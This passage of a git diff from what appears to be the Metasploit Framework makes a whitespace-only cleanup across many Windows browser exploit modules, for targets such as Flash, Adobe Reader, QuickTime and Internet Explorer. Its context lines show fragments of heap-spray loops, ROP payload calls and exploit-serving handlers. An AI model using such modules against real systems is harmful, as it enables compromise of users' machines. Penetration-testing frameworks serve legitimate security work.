413aae120e..544c5ecd23 100644 --- a/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb +++ b/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb @@ -128,5 +128,4 @@ class MetasploitModule < Msf::Exploit::Remote swf end - end diff --git a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb index a63236dd3f..4d280b09b4 100644 --- a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb +++ b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb @@ -290,7 +290,6 @@ pluginspage="http://www.macromedia.com/go/getflashplayer"> return mp4 end - end =begin diff --git a/modules/exploits/windows/browser/adobe_flash_otf_font.rb b/modules/exploits/windows/browser/adobe_flash_otf_font.rb index 383c8a28d2..ac4a01d0ab 100644 --- a/modules/exploits/windows/browser/adobe_flash_otf_font.rb +++ b/modules/exploits/windows/browser/adobe_flash_otf_font.rb @@ -228,5 +228,4 @@ class MetasploitModule < Msf::Exploit::Remote fd.close return swf end - end diff --git a/modules/exploits/windows/browser/adobe_flash_pcre.rb b/modules/exploits/windows/browser/adobe_flash_pcre.rb index 26ec5e22de..f00856a22b 100644 --- a/modules/exploits/windows/browser/adobe_flash_pcre.rb +++ b/modules/exploits/windows/browser/adobe_flash_pcre.rb @@ -116,5 +116,4 @@ class MetasploitModule < Msf::Exploit::Remote swf end - end diff --git a/modules/exploits/windows/browser/adobe_flash_regex_value.rb b/modules/exploits/windows/browser/adobe_flash_regex_value.rb index 5705b19ef8..2312307b62 100644 --- a/modules/exploits/windows/browser/adobe_flash_regex_value.rb +++ b/modules/exploits/windows/browser/adobe_flash_regex_value.rb @@ -119,5 +119,4 @@ class MetasploitModule < Msf::Exploit::Remote swf end - end diff --git a/modules/exploits/windows/browser/adobe_flash_rtmp.rb b/modules/exploits/windows/browser/adobe_flash_rtmp.rb index fe528c2198..a9538f9bb5 100644 --- a/modules/exploits/windows/browser/adobe_flash_rtmp.rb +++ b/modules/exploits/windows/browser/adobe_flash_rtmp.rb @@ -427,7 +427,6 @@ class MetasploitModule < Msf::Exploit::Remote return swf end - end =begin diff --git a/modules/exploits/windows/browser/adobe_flash_sps.rb b/modules/exploits/windows/browser/adobe_flash_sps.rb index dcb4619f27..1ea4c2418b 100644 --- a/modules/exploits/windows/browser/adobe_flash_sps.rb +++ b/modules/exploits/windows/browser/adobe_flash_sps.rb @@ -310,7 +310,6 @@ class MetasploitModule < Msf::Exploit::Remote m = ftypAtom + mdatAtom + moovAtom return m end - end =begin diff --git a/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb b/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb index 11f69a53a1..f5bb02c212 100644 --- a/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb +++ b/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb @@ -105,5 +105,4 @@ class MetasploitModule < Msf::Exploit::Remote swf end - end diff --git a/modules/exploits/windows/browser/adobe_flash_worker_byte_array_uaf.rb b/modules/exploits/windows/browser/adobe_flash_worker_byte_array_uaf.rb index 98e481cd37..728eff00de 100644 --- a/modules/exploits/windows/browser/adobe_flash_worker_byte_array_uaf.rb +++ b/modules/exploits/windows/browser/adobe_flash_worker_byte_array_uaf.rb @@ -104,5 +104,4 @@ class MetasploitModule < Msf::Exploit::Remote swf end - end diff --git a/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb b/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb index d4381c7e99..54d7a85015 100644 --- a/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb +++ b/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb @@ -417,5 +417,4 @@ for (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+"s"; pdf << "%%EOF" << eol pdf end - end diff --git a/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb b/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb index 0a22131b1a..486a826c0c 100644 --- a/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb +++ b/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb @@ -233,5 +233,4 @@ for(i = 0; i < 128; i++) { memory[i]= #{rand2} + #{rand1}; } pdf << "%%EOF" << eol end - end diff --git a/modules/exploits/windows/browser/adobe_geticon.rb b/modules/exploits/windows/browser/adobe_geticon.rb index ef9c4b7bfd..b2cee87b3c 100644 --- a/modules/exploits/windows/browser/adobe_geticon.rb +++ b/modules/exploits/windows/browser/adobe_geticon.rb @@ -199,5 +199,4 @@ class MetasploitModule < Msf::Exploit::Remote pdf << "%%EOF" << eol end - end diff --git a/modules/exploits/windows/browser/adobe_jbig2decode.rb b/modules/exploits/windows/browser/adobe_jbig2decode.rb index 3b3fcf3ecd..98758284fa 100644 --- a/modules/exploits/windows/browser/adobe_jbig2decode.rb +++ b/modules/exploits/windows/browser/adobe_jbig2decode.rb @@ -229,5 +229,4 @@ class MetasploitModule < Msf::Exploit::Remote pdf << xrefPosition.to_s() << eol pdf << "%%EOF" << eol end - end diff --git a/modules/exploits/windows/browser/adobe_media_newplayer.rb b/modules/exploits/windows/browser/adobe_media_newplayer.rb index 3a050e890b..ae7ed95b27 100644 --- a/modules/exploits/windows/browser/adobe_media_newplayer.rb +++ b/modules/exploits/windows/browser/adobe_media_newplayer.rb @@ -215,5 +215,4 @@ util.printd(#{rand3}, new Date()); pdf << "%%EOF" << eol end - end diff --git a/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb b/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb index e3dc3f4dc2..aca1c291b7 100644 --- a/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb +++ b/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb @@ -125,5 +125,4 @@ EOS handler(cli) end - end diff --git a/modules/exploits/windows/browser/adobe_toolbutton.rb b/modules/exploits/windows/browser/adobe_toolbutton.rb index df791f205b..6e12e17004 100644 --- a/modules/exploits/windows/browser/adobe_toolbutton.rb +++ b/modules/exploits/windows/browser/adobe_toolbutton.rb @@ -319,7 +319,6 @@ if (vulnerable) { pdf << "%%EOF" << eol pdf end - end diff --git a/modules/exploits/windows/browser/adobe_utilprintf.rb b/modules/exploits/windows/browser/adobe_utilprintf.rb index bd94a3f49a..e8430aefe7 100644 --- a/modules/exploits/windows/browser/adobe_utilprintf.rb +++ b/modules/exploits/windows/browser/adobe_utilprintf.rb @@ -179,5 +179,4 @@ class MetasploitModule < Msf::Exploit::Remote pdf << "%%EOF" << eol end - end diff --git a/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb b/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb index fe585b47ed..d78af4d26a 100644 --- a/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb +++ b/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb @@ -161,5 +161,4 @@ test.GetColor("#{rop_payload(get_payload(cli, target_info))}", 0); xpl end - end diff --git a/modules/exploits/windows/browser/aim_goaway.rb b/modules/exploits/windows/browser/aim_goaway.rb index 2a6b076d8e..4d5cfe8f9a 100644 --- a/modules/exploits/windows/browser/aim_goaway.rb +++ b/modules/exploits/windows/browser/aim_goaway.rb @@ -83,5 +83,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb index a1d998cee0..9ce3ffea86 100644 --- a/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb +++ b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb @@ -173,7 +173,6 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Sending HTML...") send_exploit_html(cli, exploit_template(cli, target_info)) end - end =begin diff --git a/modules/exploits/windows/browser/amaya_bdo.rb b/modules/exploits/windows/browser/amaya_bdo.rb index 951429efeb..0f32979a45 100644 --- a/modules/exploits/windows/browser/amaya_bdo.rb +++ b/modules/exploits/windows/browser/amaya_bdo.rb @@ -73,5 +73,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/aol_ampx_convertfile.rb b/modules/exploits/windows/browser/aol_ampx_convertfile.rb index 58e7979f88..27deef3faa 100644 --- a/modules/exploits/windows/browser/aol_ampx_convertfile.rb +++ b/modules/exploits/windows/browser/aol_ampx_convertfile.rb @@ -120,5 +120,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/apple_itunes_playlist.rb b/modules/exploits/windows/browser/apple_itunes_playlist.rb index b7b850efc3..ca9bd04c48 100644 --- a/modules/exploits/windows/browser/apple_itunes_playlist.rb +++ b/modules/exploits/windows/browser/apple_itunes_playlist.rb @@ -69,5 +69,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb b/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb index 0e9dfecc13..96ce3dabe0 100644 --- a/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb +++ b/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb @@ -229,7 +229,6 @@ EOF # Handle the payload handler(client) end - end diff --git a/modules/exploits/windows/browser/apple_quicktime_mime_type.rb b/modules/exploits/windows/browser/apple_quicktime_mime_type.rb index 3a0d34711e..d699db5816 100644 --- a/modules/exploits/windows/browser/apple_quicktime_mime_type.rb +++ b/modules/exploits/windows/browser/apple_quicktime_mime_type.rb @@ -222,5 +222,4 @@ CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab"> # Handle the payload handler(client) end - end diff --git a/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb b/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb index dd84534b9f..5541868f87 100644 --- a/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb +++ b/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb @@ -153,5 +153,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(client) end - end diff --git a/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb b/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb index 34c0fda847..f65744b8a5 100644 --- a/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb +++ b/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb @@ -274,7 +274,6 @@ CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab"> send_response(client, content, { 'Content-Type' => "text/html" }) end end - end diff --git a/modules/exploits/windows/browser/ask_shortformat.rb b/modules/exploits/windows/browser/ask_shortformat.rb index 9b8f6ed702..9258b25292 100644 --- a/modules/exploits/windows/browser/ask_shortformat.rb +++ b/modules/exploits/windows/browser/ask_shortformat.rb @@ -83,5 +83,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb b/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb index eb41aa1cfc..d097c19aa6 100644 --- a/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb +++ b/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb @@ -153,7 +153,6 @@ class MetasploitModule < Msf::Exploit::Remote send_response(cli, html, {'Content-Type'=>'text/html'}) end - end =begin diff --git a/modules/exploits/windows/browser/autodesk_idrop.rb b/modules/exploits/windows/browser/autodesk_idrop.rb index d344b8bc5c..72da428bf9 100644 --- a/modules/exploits/windows/browser/autodesk_idrop.rb +++ b/modules/exploits/windows/browser/autodesk_idrop.rb @@ -131,5 +131,4 @@ function #{j_function}() { # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/aventail_epi_activex.rb b/modules/exploits/windows/browser/aventail_epi_activex.rb index 1aac09ba02..5d537b11d0 100644 --- a/modules/exploits/windows/browser/aventail_epi_activex.rb +++ b/modules/exploits/windows/browser/aventail_epi_activex.rb @@ -152,5 +152,4 @@ for (#{j_counter} = 0; #{j_counter} < 22; #{j_counter}++) # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb b/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb index 4e3d798277..96c1c7ca2a 100644 --- a/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb +++ b/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb @@ -118,5 +118,4 @@ vulnerable.OnBeforeVideoDownload(evil_string); # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/barcode_ax49.rb b/modules/exploits/windows/browser/barcode_ax49.rb index 1d3aae11d8..216971871b 100644 --- a/modules/exploits/windows/browser/barcode_ax49.rb +++ b/modules/exploits/windows/browser/barcode_ax49.rb @@ -78,5 +78,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb index f3e2131511..ee5194e6c2 100644 --- a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb +++ b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb @@ -138,5 +138,4 @@ class MetasploitModule < Msf::Exploit::Remote @payload = generate_payload_exe super end - end diff --git a/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb b/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb index 3a61b7fe6a..02dcf6e336 100644 --- a/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb +++ b/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb @@ -113,5 +113,4 @@ class MetasploitModule < Msf::Exploit::Remote @payload_rand = rand_text_alpha(rand(5) + 5 ) super end - end diff --git a/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb b/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb index 79eba846db..f09b43c31f 100644 --- a/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb +++ b/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb @@ -107,5 +107,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/chilkat_crypt_writefile.rb b/modules/exploits/windows/browser/chilkat_crypt_writefile.rb index 5fd0ccfe8d..c9f17310a4 100644 --- a/modules/exploits/windows/browser/chilkat_crypt_writefile.rb +++ b/modules/exploits/windows/browser/chilkat_crypt_writefile.rb @@ -140,5 +140,4 @@ Please wait... handler(cli) end - end diff --git a/modules/exploits/windows/browser/clear_quest_cqole.rb b/modules/exploits/windows/browser/clear_quest_cqole.rb index 68464f17b2..7f9a9f35b7 100644 --- a/modules/exploits/windows/browser/clear_quest_cqole.rb +++ b/modules/exploits/windows/browser/clear_quest_cqole.rb @@ -112,7 +112,6 @@ class MetasploitModule < Msf::Exploit::Remote send_response(cli, html, {'Content-Type'=>'text/html'}) end - end =begin diff --git a/modules/exploits/windows/browser/communicrypt_mail_activex.rb b/modules/exploits/windows/browser/communicrypt_mail_activex.rb index 8f40bc6cc4..63705accfe 100644 --- a/modules/exploits/windows/browser/communicrypt_mail_activex.rb +++ b/modules/exploits/windows/browser/communicrypt_mail_activex.rb @@ -88,5 +88,4 @@ var #{strname} = new String('#{sploit}'); # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/creative_software_cachefolder.rb b/modules/exploits/windows/browser/creative_software_cachefolder.rb index 0057efc993..b7e9a40f08 100644 --- a/modules/exploits/windows/browser/creative_software_cachefolder.rb +++ b/modules/exploits/windows/browser/creative_software_cachefolder.rb @@ -100,5 +100,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/crystal_reports_printcontrol.rb b/modules/exploits/windows/browser/crystal_reports_printcontrol.rb index ee42e23d5e..c6d8567d37 100644 --- a/modules/exploits/windows/browser/crystal_reports_printcontrol.rb +++ b/modules/exploits/windows/browser/crystal_reports_printcontrol.rb @@ -308,5 +308,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Sending HTML...") send_response(cli, html, {'Content-Type'=>'text/html'}) end - end diff --git a/modules/exploits/windows/browser/dell_webcam_crazytalk.rb b/modules/exploits/windows/browser/dell_webcam_crazytalk.rb index d242073820..df71e3ad4e 100644 --- a/modules/exploits/windows/browser/dell_webcam_crazytalk.rb +++ b/modules/exploits/windows/browser/dell_webcam_crazytalk.rb @@ -126,7 +126,6 @@ class MetasploitModule < Msf::Exploit::Remote send_response(cli, html, {'Content-Type'=>'text/html'}) end - end =begin diff --git a/modules/exploits/windows/browser/ea_checkrequirements.rb b/modules/exploits/windows/browser/ea_checkrequirements.rb index ae1948b122..d405398a62 100644 --- a/modules/exploits/windows/browser/ea_checkrequirements.rb +++ b/modules/exploits/windows/browser/ea_checkrequirements.rb @@ -107,5 +107,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb b/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb index 4c51245e5a..0c25d3c727 100644 --- a/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb +++ b/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb @@ -100,5 +100,4 @@ for (#{var_i} = 0; #{var_i} < 1324; #{var_i}++) { #{rand8} = #{rand8} + unescape handler(cli) end - end diff --git a/modules/exploits/windows/browser/enjoysapgui_comp_download.rb b/modules/exploits/windows/browser/enjoysapgui_comp_download.rb index 7ac6b4155e..e0dfd86a20 100644 --- a/modules/exploits/windows/browser/enjoysapgui_comp_download.rb +++ b/modules/exploits/windows/browser/enjoysapgui_comp_download.rb @@ -92,5 +92,4 @@ class MetasploitModule < Msf::Exploit::Remote handler(cli) end - end diff --git a/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb b/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb index 99e310c967..eb3a94890e 100644 --- a/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb +++ b/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb @@ -84,5 +84,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/facebook_extractiptc.rb b/modules/exploits/windows/browser/facebook_extractiptc.rb index c754f01952..2f94ed72ad 100644 --- a/modules/exploits/windows/browser/facebook_extractiptc.rb +++ b/modules/exploits/windows/browser/facebook_extractiptc.rb @@ -94,5 +94,4 @@ while (#{rand1}.length <= 261) #{rand1} = #{rand1} + unescape('#{filler}'); # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb index 1a140082f0..1839bf6b42 100644 --- a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb +++ b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb @@ -186,5 +186,4 @@ class MetasploitModule < Msf::Exploit::Remote handler(cli) end end - end diff --git a/modules/exploits/windows/browser/gom_openurl.rb b/modules/exploits/windows/browser/gom_openurl.rb index b0b651a5ef..bbf1eedcdc 100644 --- a/modules/exploits/windows/browser/gom_openurl.rb +++ b/modules/exploits/windows/browser/gom_openurl.rb @@ -84,5 +84,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb b/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb index 91d39b4599..23b6d823ad 100644 --- a/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb +++ b/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb @@ -199,5 +199,4 @@ SetLocale(#{var_origLoc})|) send_response(cli, html, {'Content-Type'=>'text/html'}) end - end diff --git a/modules/exploits/windows/browser/honeywell_tema_exec.rb b/modules/exploits/windows/browser/honeywell_tema_exec.rb index 862cb02783..d50afe4501 100644 --- a/modules/exploits/windows/browser/honeywell_tema_exec.rb +++ b/modules/exploits/windows/browser/honeywell_tema_exec.rb @@ -163,5 +163,4 @@ class MetasploitModule < Msf::Exploit::Remote send_response(cli, html, {'Content-Type'=>'text/html'}) end - end diff --git a/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb b/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb index f0d05d0803..cf6cf206ee 100644 --- a/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb +++ b/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb @@ -264,5 +264,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Sending HTML...") send_response(cli, html, {'Content-Type'=>'text/html'}) end - end diff --git a/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb b/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb index ef086095f8..ba96bb77e9 100644 --- a/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb +++ b/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb @@ -151,5 +151,4 @@ class MetasploitModule < Msf::Exploit::Remote @mof_content = Rex::Text.to_hex(generate_mof("#{@var_mof_name}.mof", "#{@var_vbs_name}.vbs")) super end - end diff --git a/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb b/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb index 30c4625a13..cbed7c6e49 100644 --- a/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb +++ b/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb @@ -164,5 +164,4 @@ class MetasploitModule < Msf::Exploit::Remote @mof_content = Rex::Text.to_hex(generate_mof("#{@var_mof_name}.mof", "#{@var_vbs_name}.vbs")) super end - end diff --git a/modules/exploits/windows/browser/hp_loadrunner_addfile.rb b/modules/exploits/windows/browser/hp_loadrunner_addfile.rb index f57140d5ec..e700c73963 100644 --- a/modules/exploits/windows/browser/hp_loadrunner_addfile.rb +++ b/modules/exploits/windows/browser/hp_loadrunner_addfile.rb @@ -96,5 +96,4 @@ function check() # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb b/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb index f9dc9279f2..833b720f0e 100644 --- a/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb +++ b/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb @@ -82,5 +82,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb b/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb index 639206ca85..9ad0e96266 100644 --- a/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb +++ b/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb @@ -250,5 +250,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Sending HTML...") send_response(cli, html, {'Content-Type'=>'text/html'}) end - end diff --git a/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb b/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb index dc76272be5..b5fa5eb209 100644 --- a/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb +++ b/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb @@ -143,5 +143,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Sending HTML...") send_response(cli, html, {'Content-Type'=>'text/html'}) end - end diff --git a/modules/exploits/windows/browser/hpmqc_progcolor.rb b/modules/exploits/windows/browser/hpmqc_progcolor.rb index 470d980c31..fd8436d882 100644 --- a/modules/exploits/windows/browser/hpmqc_progcolor.rb +++ b/modules/exploits/windows/browser/hpmqc_progcolor.rb @@ -110,5 +110,4 @@ while (#{j_ret}.length < #{offset}) #{j_ret} += #{j_ret}; # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb b/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb index cf9e6e066c..e219258d06 100644 --- a/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb +++ b/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb @@ -126,5 +126,4 @@ for(#{j_counter}=0;#{j_counter}<=#{offset};#{j_counter}++)#{j_ret}+=unescape('#{ # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/ibm_spss_c1sizer.rb b/modules/exploits/windows/browser/ibm_spss_c1sizer.rb index 37112f0265..4bdc14d980 100644 --- a/modules/exploits/windows/browser/ibm_spss_c1sizer.rb +++ b/modules/exploits/windows/browser/ibm_spss_c1sizer.rb @@ -377,7 +377,6 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Sending HTML...") send_response(cli, html, {'Content-Type'=>'text/html'}) end - end diff --git a/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb b/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb index 6c2e5b0e11..25ddd7735c 100644 --- a/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb +++ b/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb @@ -234,7 +234,6 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Sending html") send_response(cli, html, {'Content-Type'=>'text/html'}) end - end =begin diff --git a/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb b/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb index a7839675a2..8c626702c3 100644 --- a/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb +++ b/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb @@ -112,5 +112,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb b/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb index 20937534d8..b744829268 100644 --- a/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb +++ b/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb @@ -122,5 +122,4 @@ EOF # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/ie_cbutton_uaf.rb b/modules/exploits/windows/browser/ie_cbutton_uaf.rb index 65575f8a11..b576ba3056 100644 --- a/modules/exploits/windows/browser/ie_cbutton_uaf.rb +++ b/modules/exploits/windows/browser/ie_cbutton_uaf.rb @@ -248,7 +248,6 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Sending HTML...") send_response(cli, html, {'Content-Type'=>'text/html'}) end - end diff --git a/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb b/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb index bdcb7cbd5a..a8d03bf116 100644 --- a/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb +++ b/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb @@ -229,5 +229,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Sending HTML...") send_response(cli, html, {'Content-Type'=>'text/html'}) end - end diff --git a/modules/exploits/windows/browser/ie_createobject.rb b/modules/exploits/windows/browser/ie_createobject.rb index 6a3a988bc7..d5c6fdbef3 100644 --- a/modules/exploits/windows/browser/ie_createobject.rb +++ b/modules/exploits/windows/browser/ie_createobject.rb @@ -260,5 +260,4 @@ function #{var_func_exploit}( ) { # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/ie_execcommand_uaf.rb b/modules/exploits/windows/browser/ie_execcommand_uaf.rb index 3e1cc72776..5f0c33894c 100644 --- a/modules/exploits/windows/browser/ie_execcommand_uaf.rb +++ b/modules/exploits/windows/browser/ie_execcommand_uaf.rb @@ -342,7 +342,6 @@ class MetasploitModule < Msf::Exploit::Remote @html2_name = "#{Rex::Text.rand_text_alpha(6)}.html" super end - end diff --git a/modules/exploits/windows/browser/ie_iscomponentinstalled.rb b/modules/exploits/windows/browser/ie_iscomponentinstalled.rb index d302027740..c1422281c6 100644 --- a/modules/exploits/windows/browser/ie_iscomponentinstalled.rb +++ b/modules/exploits/windows/browser/ie_iscomponentinstalled.rb @@ -91,5 +91,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb b/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb index b4b11a4eff..c215dc07b6 100644 --- a/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb +++ b/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb @@ -318,7 +318,6 @@ window.onload = function() { send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'}) end - end =begin diff --git a/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb b/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb index 4e2a902b33..32a8417a0d 100644 --- a/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb +++ b/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb @@ -278,7 +278,6 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Sending HTML...") send_response(cli, html, {'Content-Type'=>'text/html'}) end - end =begin diff --git a/modules/exploits/windows/browser/inotes_dwa85w_bof.rb b/modules/exploits/windows/browser/inotes_dwa85w_bof.rb index c7584b7778..adf2fd1a5b 100644 --- 